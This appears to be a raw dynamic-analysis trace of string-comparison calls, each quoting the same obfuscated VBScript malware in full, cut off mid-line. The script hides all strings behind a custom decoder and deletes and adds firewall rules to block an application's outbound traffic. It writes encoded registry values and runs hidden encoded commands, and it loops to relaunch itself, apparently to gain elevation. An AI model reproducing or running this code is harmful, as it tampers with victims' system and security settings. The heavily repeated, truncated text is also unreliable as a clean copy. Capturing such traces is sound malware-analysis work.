bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.279] wcsncmp (_String1="\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0226.279] wcsncmp (_String1="\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.279] wcsncmp (_String1="Dim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.279] wcsncmp (_String1="im key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, 